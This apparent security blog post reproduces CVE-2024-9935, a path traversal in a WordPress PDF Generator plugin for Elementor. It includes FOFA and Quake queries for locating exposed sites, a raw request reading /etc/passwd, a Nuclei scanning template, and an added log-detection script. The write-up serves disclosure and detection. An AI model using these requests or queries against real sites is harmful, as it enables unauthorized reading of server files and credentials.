[Vulnerability Reproduction] CVE-2024-9935


混子Hacker 2024-12-04 13:17


Disclaimer

Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided in this article are the sole responsibility of the user; the author accepts no legal or joint liability.

Vulnerability Overview

—— The road is long and hard, but those who walk it will arrive; keep going without pause, and the future holds promise ——

CVE-2024-9935

The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to path traversal in all versions up to and including 1.7.5, via the rtw_pgaepb_dwnld_pdf() function. This allows unauthenticated attackers to read the contents of arbitrary files on the server, which may contain sensitive information.

Vulnerability Information


01 Asset Mapping

fofa: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
Quake:body:"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"


02 Vulnerability Reproduction

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: xxx
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36


03 Nuclei PoC

id: CVE-2024-9935
info:
  name: PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Arbitrary File Download
  author: s4e-io
  severity: high
  description: |
    The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-9935
    - https://plugins.trac.wordpress.org/browser/pdf-generator-addon-for-elementor-page-builder/trunk/public/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/36daf2af-1db3-4b35-8849-480212660b2f?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-9935
    cwe-id: CWE-22
    epss-score: 0.0009
    epss-percentile: 0.39758
  metadata:
    verified: true
    max-request: 2
    vendor: RedefiningTheWeb
    product: pdf-generator-addon-for-elementor-page-builder
    framework: wordpress
    fofa-query: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generator
flow: http(1) && http(2)
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/pdf-generator-addon-for-elementor-page-builder")'
        internal: true
  - raw:
      - |
        GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/pdf")
          - status_code == 200
        condition: and
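An added detection example, not code from the original post or from the plugin: this Python script scans constructed Apache-style access-log lines for the rtw_generate_pdf / rtw_pdf_file request shape shown in the request and Nuclei template above, and flags values that escape the plugin's PDF directory, including double-encoded traversal sequences. The log format and the SAMPLE_LOG entries are assumptions; the parameter names come from the request above.

```python
# Added example (not from the original post): flag requests to the PDF Generator
# Addon's rtw_generate_pdf endpoint whose rtw_pdf_file value escapes the PDF
# directory, including double-encoded traversal. Log lines are constructed.
import re
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2024:13:17:01 +0000] "GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1839 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2024:13:17:02 +0000] "GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=%252e%252e%2fwp-config.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Dec/2024:13:18:10 +0000] "GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=brochure.pdf HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Dec/2024:13:19:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "curl/8.0"
"""

# Combined Log Format: client IP, timestamp, request line, status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded sequences (%252e) are unmasked."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(path_param: str) -> bool:
    """True if the decoded value would leave the plugin's PDF directory."""
    decoded = fully_decode(path_param).replace("\\", "/")
    if decoded.startswith("/"):          # absolute path supplied directly
        return True
    return any(seg == ".." for seg in decoded.split("/"))

def find_traversal_attempts(log_text: str) -> list:
    """Return (ip, status, decoded_file) for each suspicious PDF-generator request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)   # parse_qs decodes once
        if query.get("rtw_generate_pdf", [""])[0] != "true":
            continue
        for candidate in query.get("rtw_pdf_file", []):
            if is_traversal(candidate):
                hits.append((m["ip"], int(m["status"]), fully_decode(candidate)))
    return hits
```

A 200 status on a flagged request is the case worth escalating, since the patched plugin should not serve a file outside its PDF directory.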


Original article | Please include a link to the original source when reposting

More vulnerabilities | Follow the author to see them

Author | 混子Hacker